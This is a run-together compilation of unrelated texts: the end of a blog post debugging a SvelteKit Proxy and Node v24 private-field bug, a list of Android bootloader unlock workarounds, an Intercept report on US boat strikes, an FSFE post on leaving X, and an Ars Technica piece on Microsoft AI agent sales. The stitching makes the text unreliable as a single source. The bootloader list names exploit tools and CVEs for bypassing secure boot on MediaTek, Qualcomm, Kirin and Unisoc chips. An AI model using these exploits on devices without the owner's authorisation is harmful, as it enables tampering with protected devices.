This explains why the stack trace was showing Proxy.clone() instead of Response.clone(): when clone() was running, this was an instance of Proxy, not an instance of Response.
You might be wondering why this issue only occurred in prod/staging and not locally. The answer is that I was being stupid 4 .
I was convinced that this was happening because of the big Svelte upgrade I had just done, but the truth is that it’s completely unrelated: this just happened to be the first update I’d made to the app since the node:lts Docker image changed from Node v22 to Node v24 in October 2025. In the CI pipeline, it was Node v24 that was being pulled instead of v22 – the #state private field was introduced in v24, so that is why the issue was not showing before.

As to why it wasn’t showing when I ran it locally using Docker – my Docker was using a cached node:lts image, which was the old v22 one. 🤦🏻♂️
I tried verifying this by doing fnm use 24 followed by pnpm dev, but the bug was still mysteriously missing.

It is at this point that I found out that pnpm has its own node version manager built-in, which you can change using pnpm use --global 24. If you want to be sure, you can do pnpm exec node --version to tell you.

So not only can pnpm manage its own version using the packageManager field in package.json, it can also manage the node version. What a crazy world we live in.
With the pnpm-managed node version set to 24, sure enough the issue was present locally. Applying the quick fix recommended in the undici GitHub issue as a manual patch to the library files in node_modules fixed the issue:
  const proxy = new Proxy(response, {
-   get(response, key, _receiver) {
+   get(response, key, receiver) {
      // Lots of SvelteKit-specific functionality which isn't relevant for us
      // ...

-     return Reflect.get(response, key, response);
+     const value = Reflect.get(response, key, response);
+
+     if (value instanceof Function) {
+       // On Node v24+, the Response object has a private element #state – we
+       // need to bind this function to the response in order to allow it to
+       // access this private element. Defining the name and length ensure it
+       // is identical to the original function when introspected.
+       return Object.defineProperties(
+         /**
+          * @this {any}
+          */
+         function () {
+           return Reflect.apply(value, this === receiver ? response : this, arguments);
+         },
+         {
+           name: { value: value.name },
+           length: { value: value.length }
+         }
+       );
+     }
+
+     return value;
    }
  });
What’s with the Object.defineProperties() nonsense?
This is probably not needed, but the recommended fix from MDN returns a bound method that is slightly different from the original. You can see this by comparing the 2 different methods:
class Person {
  #hunger = "hungry";

  status(name, email) {
    return `I am ${name} <${email}> and I am ${this.#hunger}`;
  }
};

const me = new Person();

brokenProxy = new Proxy(me, {
  get(target, prop, receiver) {
    return Reflect.get(target, prop, receiver);
  }
})

plainProxy = new Proxy(me, {
  get(target, prop, receiver) {
    const value = Reflect.get(target, prop, receiver);

    if (value instanceof Function) {
      return function (...args) {
        return value.apply(target, args);
      }
    }

    return value;
  }
});

fancyProxy = new Proxy(me, {
  get(target, prop, receiver) {
    const value = Reflect.get(target, prop, receiver);

    if (value instanceof Function) {
      // On Node v24+, the Response object has a private element #state – we
      // need to bind this function to the response in order to allow it to
      // access this private element. Defining the name and length ensure it
      // is identical to the original function when introspected.
      return Object.defineProperties(
        function () {
          return Reflect.apply(value, this === receiver ? target : this, arguments);
        },
        {
          name: { value: value.name },
          length: { value: value.length }
        }
      );
    }

    return value;
  }
});
Here are the differences:
» brokenProxy.status("Drew", "[email protected]")
⚠︎ brokenProxy.status()
Uncaught TypeError: can't access private field or method: object is not the right class
status debugger eval code:5
<anonymous> debugger eval code:1
» plainProxy.status("Drew", "[email protected]")
← "I am Drew <[email protected]> and I am hungry"
» plainProxy.status.name
← ""
» plainProxy.status.length
← 0
» fancyProxy.status("Drew", "[email protected]")
← "I am Drew <[email protected]> and I am hungry"
» fancyProxy.status.name
← "status"
» fancyProxy.status.length
← 2
As expected, the original proxy is broken: this is not bound correctly, so the private Person.#hunger field cannot be accessed. Both the plain and fancy proxies work when invoked, but when you look at their name and length (the latter being the number of arguments), they differ.
Some JavaScript code will introspect a method to see what the name and length are for various (somewhat hacky) reasons. (There’s a lot of bad JavaScript code out there, trust me – I only wrote some of it.) This is probably pretty unlikely, but if you thought this was a bad bug to find, just think about how nasty it would be to track down some stray code that was introspecting the name and/or length of some random method on response and making faulty assumptions based on the incorrect values presented by the proxied method 🤢
I created a PR with this fix whereupon it was quickly merged and within 4 days it was bundled into the next SvelteKit release – this project is really actively maintained.
I was quite surprised that this wasn’t picked up by anyone else – after all, any call to response.clone() where the response comes from SvelteKit’s fetch() inside a page load handler would trigger this bug as long as you’re on Node v24+. I guess cloning responses isn’t a very common thing to do? 🤷🏻
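For reference, a minimal reproduction would have looked something like this. This is my own sketch, assuming a +page.server.js load function on Node v24+ with a pre-fix SvelteKit; /api/dashboard is a made-up endpoint:
export async function load({ fetch }) {
  // SvelteKit wraps this fetch, so `response` below is actually the Proxy.
  const response = await fetch('/api/dashboard');

  // On Node v24+ (before the fix), clone() runs with `this` bound to the Proxy
  // and throws: TypeError: Cannot read private member #state ...
  const copy = response.clone();

  return { data: await copy.json() };
}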
Regardless, the murderer is serving hard time, the patient is recovering, and I can go touch some grass and not think about JavaScript for a while.
If House was so clever, he would know that his first guess isn’t right because it’s only 10 minutes into the episode but hey, I’m not the one with the medical degree. ↩
I am mixing the metaphors a little here – first it’s a murder, now it’s a diagnostic mystery – just stick with it. ↩
If you’re wondering what the difference is between obj[key] and Reflect.get(obj, key, obj): it only makes a difference when key has a getter defined on obj, which means that doing obj[key] actually invokes the getter method – Reflect.get() ensures that this is correctly bound to obj when the getter is invoked. ↩
To be fair, this is generally a decent bet. ↩
Keeping track of companies that "care about your data 🥺"
Over the past few years, a suspicious number of companies have started to "take care of your data", aka block/strictly limit your ability to unlock the bootloader on your own devices.
While this may not affect you directly, it sets a bad precedent. You never know what will get the axe next: Shizuku? ADB?
They've already gone after sideloading .
I thought it might be a good idea to keep track of bad companies and workarounds.
If you know of specific details/unlocking methods, please PR them or drop them in the discussions
Caution
Reminder that no matter how nice a company is,
you should not trust them unless their unlock process is 100% offline!
The following manufacturers have made it completely impossible to unlock their devices without a workaround.
Note
Phone brands handle carrier locks differently, so check your device manual or contact support.
Carrier locked devices are the ones you get after making a commitment with a carrier of your choice. This is quite common in North America and (supposedly) allows you to save some money on your device.
As a rule, almost all carrier locked devices do not allow the bootloader to be unlocked. This usually makes sense, as it would allow you to completely bypass the contract. The problem is that many devices still do not allow you to unlock the bootloader even after the carrier lock has been lifted. For more details, see the carriers page .
The following manufacturers allow unlocking under certain conditions, such as region, model, SOC, etc., or require a sacrifice to unlock.
The following manufacturers require an online account and/or a waiting period before unlocking.
Custom Android Verified Boot (AVB) keys are a feature that allows you to run a custom OS with a locked bootloader.
It's rare to see a device which supports custom AVB keys, but some devices can be found here.
Kirin 620, 650, 655, 658, 659, 925, 935, 950, 960: It's possible to unlock using testpoints and PotatoNV (read the readme).
If you own a MediaTek device exploitable by mtkclient, you can unlock the bootloader using that.
If it also happens to be an OPPO/Realme device and you need to access fastboot: lkpatcher (web version).
There's no universal Qualcomm method, unfortunately. Although some of these might work for you:
- The general exploit: alephsecurity.com, the bootloader unlock section.
- Xiaomi Mi A1 and maybe all MSM89** devices manufactured before 2018: EDLUnlock
If you own a phone with the Unisoc UMS9620 or older, you can use this exploit to achieve a temporary secure boot bypass and persistently unlock the bootloader (except on some devices with a modified uboot): CVE-2022-38694_unlock_bootloader
If you own a phone with the Unisoc UMS312, UMS512, or UD710, you can use this exploit to achieve a persistent secure boot bypass, which means all firmware, including splloader and uboot, can be modified and resigned: CVE-2022-38691_38692
Otherwise, you can also look into:
- Spectrum_UnlockBL_Tool
- xdaforums.com
- subut
After Pentagon press secretary Kingsley Wilson declared the War Department was certain about the identities of supposed drug smugglers killed in boat strikes, Rep. Chrissy Houlahan, D-Pa., had some questions about the intelligence. When Houlahan called on Wilson to appear before Congress, however, the outspoken and controversial spokesperson suddenly went silent.
“I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Wilson said on Tuesday during a pseudo Pentagon press briefing where attendance was limited to media outlets that have agreed to limits on the scope of their reporting.
“Our intelligence absolutely confirms who these people are,” she said. “I can tell you that, without a shadow of a doubt, every single one of our military and civilian lawyers knows that these individuals are narcoterrorists.”
In exclusive comments to The Intercept, Houlahan expressed her doubts and demanded proof.
“If there is intelligence that ‘absolutely confirms’ this — present it. Come before the House or Senate Intelligence committees and let Congress provide the proper oversight and checks and balances the American people deserve,” said Houlahan, who serves on the House Armed Services Committee and the House Permanent Select Committee on Intelligence. “Put the whispers and doubts to rest once and for all. If there is intelligence to ‘absolutely confirm’ this, the Congress is ready to receive it. Until we all see it, you can surely understand why we are skeptical.”
The House Armed Services Committee and the House Permanent Select Committee on Intelligence, both of which Houlahan serves on, routinely receive classified briefings from the military.
Wilson — who touted a “new era” of working to “keep the American people informed and to ensure transparency” on Tuesday — did not respond to questions or requests for comment from The Intercept about Houlahan’s remarks or appearing before Congress.
In past classified briefings to lawmakers and congressional staff, the military has admitted that it does not know exactly who it’s killing in the boat strikes , according to seven government officials who have spoken with The Intercept.
Rep. Sara Jacobs, D-Calif., also a member of the House Armed Services Committee, said that Pentagon officials who briefed her admitted that the administration does not know the identities of all the individuals who were killed in the strikes.
“They said that they do not need to positively identify individuals on the vessels to do the strikes,” Jacobs told The Intercept in October. “They just need to show a connection to a DTO or affiliate,” she added, using shorthand for “ designated terrorist organizations ,” the Trump administration’s term for the secret list of groups with whom it claims to be at war.
The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September and killing at least 83 civilians . It has not conducted a strike on a vessel since November 15.
Since the strikes began, experts in the laws of war and members of Congress from both parties say the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.
The summary executions mark a major departure from typical practice in the long-running U.S. war on drugs , where law enforcement agencies arrest suspected drug smugglers.
A double-tap strike during the initial September 2 attack — where the U.S. hit an incapacitated boat for a second time, killing two survivors clinging to the wreckage — added a second layer of illegality to strikes that experts and lawmakers say are already tantamount to murder. The double-tap strike was first reported by The Intercept .
War Secretary Pete Hegseth has been under increasing fire for that strike. The Washington Post recently reported that Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”
Hegseth acknowledged U.S. forces conducted a follow-up strike on the alleged drug boat during a Cabinet meeting at the White House on Tuesday but distanced himself from the killing of people struggling to stay afloat.
“I didn’t personally see survivors,” Hegseth told reporters, noting that he watched live footage of the attack. “The thing was on fire. It was exploded in fire and smoke. You can’t see it.”
He added, “This is called the fog of war.”
Hegseth said Adm. Frank M. Bradley , then the commander of Joint Special Operations Command and now head of Special Operations Command, “made the right call” in ordering the second strike, which the war secretary claimed came after he himself left the room. In a statement to The Intercept earlier this week, Special Operations Command pushed back on the contention that Bradley ordered a double-tap attack.
“He does not see his actions on 2 SEP as a ‘double tap,’” Col. Allie Weiskopf, the director of public affairs at Special Operations Command, told The Intercept on Tuesday.
Bradley and Gen. Dan Caine, the chair of the Joint Chiefs of Staff, are slated to go to Capitol Hill on Thursday to answer questions about the attack amid an ongoing uproar. Congressional staffers say that Bradley is currently slated to only meet with House Armed Services Committee Chair Mike Rogers, R-Ala., and ranking member Rep. Adam Smith, D-Wash., along with the Senate Armed Services Committee Chair Roger Wicker, R-Miss., and ranking member Sen. Jack Reed, D-R.I.
Houlahan was one of six Democratic members of Congress who appeared in a video late last month reminding members of the military of their duty not to obey illegal orders. President Donald Trump called for the group to face arrest and trial or even execution , saying the video amounted to “SEDITIOUS BEHAVIOR FROM TRAITORS.”
Wilson, during her faux press briefing — delivered to mostly administration cheerleaders after outlets from the New York Times to Fox News relinquished their Pentagon press passes rather than agree to restrictions that constrain reporters’ First Amendment rights — called out Houlahan and her fellow lawmakers in the video.
“[T]he Seditious Six urged members of our military to defy their chain of command in an unprecedented, treasonous and shameful conspiracy to sow distrust and chaos in our armed forces,” said Wilson. She went on to call the video “a politically motivated influence operation” that “puts our warfighters at risk.”
Hegseth described the members of Congress’s video as “despicable, reckless, and false.” Hegseth himself, however, had delivered a similar message recorded in 2016 footage revealed by CNN on Tuesday.
“If you’re doing something that is just completely unlawful and ruthless, then there is a consequence for that. That’s why the military said it won’t follow unlawful orders from their commander-in-chief,” Hegseth told an audience in the footage. “There’s a standard, there’s an ethos, there’s a belief that we are above what so many things that our enemies or others would do.”
Wilson did not reply to a request for comment about Hegseth’s remarks.
Hegseth is also in the hot seat after the Pentagon Inspector General’s Office determined that he risked the safety of U.S. service members by sharing sensitive military information on the Signal messaging app, according to a source familiar with the forthcoming report by the Pentagon watchdog.
The report, which is expected to be released on Thursday, was launched after a journalist at The Atlantic revealed he had been added to a chat on the encrypted messaging app, in which Hegseth and other top officials were discussing plans for U.S. airstrikes in Yemen that also killed civilians .
The Free Software Foundation Europe deleted its account on X. The platform never aligned with our values and no longer serves as a space for communication. What was initially intended to be a place for dialogue and information exchange has turned into a centralised arena of hostility, misinformation, and profit-driven control, far removed from the ideals of freedom we stand for.
Since Elon Musk acquired the social network formerly known as Twitter and rebranded it as X, the Free Software Foundation Europe (FSFE) has been closely monitoring the developments of this proprietary platform, a space we were never comfortable joining, yet one that was once important for reaching members of society who were not active in our preferred spaces for interaction. Over time, it has become increasingly hostile, with misinformation, harassment, and hate speech more visible than ever.
The FSFE initially joined Twitter because it offered a space to promote Free Software values and to interact with policymakers, journalists, and, above all, people who were not yet familiar with Free Software and its benefits. The social network was another tool the FSFE used to share information about our initiatives, to explain to users their right to control technology, and to promote software freedom across society, while also encouraging the use of alternative, decentralised social media networks.
However, the platform’s current direction and climate, combined with an algorithm that prioritises hatred, polarisation, and sensationalism, alongside growing privacy and data protection concerns, have led us to the decision to part ways with it.
Consequently, the FSFE decided to permanently delete its account on X. We remain active on some other proprietary platforms in order to reach a wider part of society, journalists, and decision makers.
At the same time, we strongly encourage everyone who shares our commitment to digital freedom and decentralisation to join us in the Fediverse. Unlike proprietary platforms driven by profit and centralised control, the Fediverse empowers users to choose how and where they connect, ensuring transparency, autonomy, and resilience. Follow the FSFE on Mastodon and Peertube !
Report: Microsoft declared “the era of AI agents” in May, but enterprise customers aren’t buying.
Microsoft has lowered sales growth targets for its AI agent products after many salespeople missed their quotas in the fiscal year ending in June, according to a report Wednesday from The Information. The adjustment is reportedly unusual for Microsoft, and it comes after the company missed a number of ambitious sales goals for its AI offerings.
AI agents are specialized implementations of AI language models designed to perform multistep tasks autonomously rather than simply responding to single prompts. So-called “agentic” features have been central to Microsoft’s 2025 sales pitch: At its Build conference in May, the company declared that it has entered “the era of AI agents.”
The company has promised customers that agents could automate complex tasks, such as generating dashboards from sales data or writing customer reports. At its Ignite conference in November, Microsoft announced new features like Word, Excel, and PowerPoint agents in Microsoft 365 Copilot, along with tools for building and deploying agents through Azure AI Foundry and Copilot Studio. But as the year draws to a close, that promise has proven harder to deliver than the company expected.
According to The Information, one US Azure sales unit set quotas for salespeople to increase customer spending on a product called Foundry , which helps customers develop AI applications, by 50 percent. Less than a fifth of salespeople in that unit met their Foundry sales growth targets. In July, Microsoft lowered those targets to roughly 25 percent growth for the current fiscal year. In another US Azure unit, most salespeople failed to meet an earlier quota to double Foundry sales, and Microsoft cut their quotas to 50 percent for the current fiscal year.
The sales figures suggest enterprises aren’t yet willing to pay premium prices for these AI agent tools. And Microsoft’s Copilot itself has faced a brand preference challenge: Earlier this year, Bloomberg reported that Microsoft salespeople were having trouble selling Copilot to enterprises because many employees prefer ChatGPT instead. The drugmaker Amgen reportedly bought Copilot software for 20,000 staffers, but many employees gravitated toward OpenAI’s chatbot instead, with Copilot mainly used for Microsoft-specific tasks like Outlook and Teams.
A Microsoft spokesperson declined to comment on the changes in sales quotas when asked by The Information. But behind these withering sales figures may lie a deeper, more fundamental issue: AI agent technology likely isn’t ready for the kind of high-stakes autonomous business work Microsoft is promising.
The concepts behind agentic AI systems emerged shortly after the release of OpenAI’s GPT-4 in 2023. They typically involve spinning off “worker tasks” to AI models running in parallel with a supervising AI model, and incorporate techniques to evaluate and act on their own results. Over the past few years, companies like Anthropic, Google, and OpenAI have refined those early approaches into far more useful products for tasks like software development, but they are still prone to errors.
At the heart of the problem is the tendency of AI language models to confabulate, which means they may confidently generate a false output that is stated as being factual. While confabulation issues have diminished over time with more recent AI models, as recent studies have shown, the simulated reasoning techniques behind the current slate of agentic AI assistants on the market can still make catastrophic mistakes and run with them, making them unreliable for the kinds of hands-off autonomous work companies like Microsoft are promising.
While looping agentic systems are better at catching their own mistakes than running a single AI model alone, they still inherit the fundamental pattern-matching limitations of the underlying AI models, particularly when facing novel problems outside their training distribution. So if an agent isn’t properly trained to perform a task or encounters a unique scenario, it could easily draw the wrong inference and make costly mistakes for a business.
The “ brittleness ” of current AI agents is why the concept of artificial general intelligence , or AGI, is so appealing to those in the AI industry. In AI, “general intelligence” typically implies an AI model that can learn or perform novel tasks without having to specifically be shown thousands or millions of examples of it beforehand. Although AGI is a nebulous term that is difficult to define in practice, if such a general AI system were ever developed, it would hypothetically make for a far more competent agentic worker than what AI companies offer today.
Despite these struggles, Microsoft continues to spend heavily on AI infrastructure. The company reported capital expenditures of $34.9 billion for its fiscal first quarter ending in October, a record, and warned that spending would rise further. The Information notes that much of Microsoft’s AI revenue comes from AI companies themselves renting cloud infrastructure rather than from traditional enterprises adopting AI tools for their own operations.
For now, as all eyes focus on a potential bubble in the AI market, Microsoft seems to be building infrastructure for a revolution that many enterprises haven’t yet signed up for.
Benj Edwards is Ars Technica's Senior AI Reporter and founder of the site's dedicated AI beat in 2022. He's also a tech historian with almost two decades of experience. In his free time, he writes and records music, collects vintage computers, and enjoys nature. He lives in Raleigh, NC.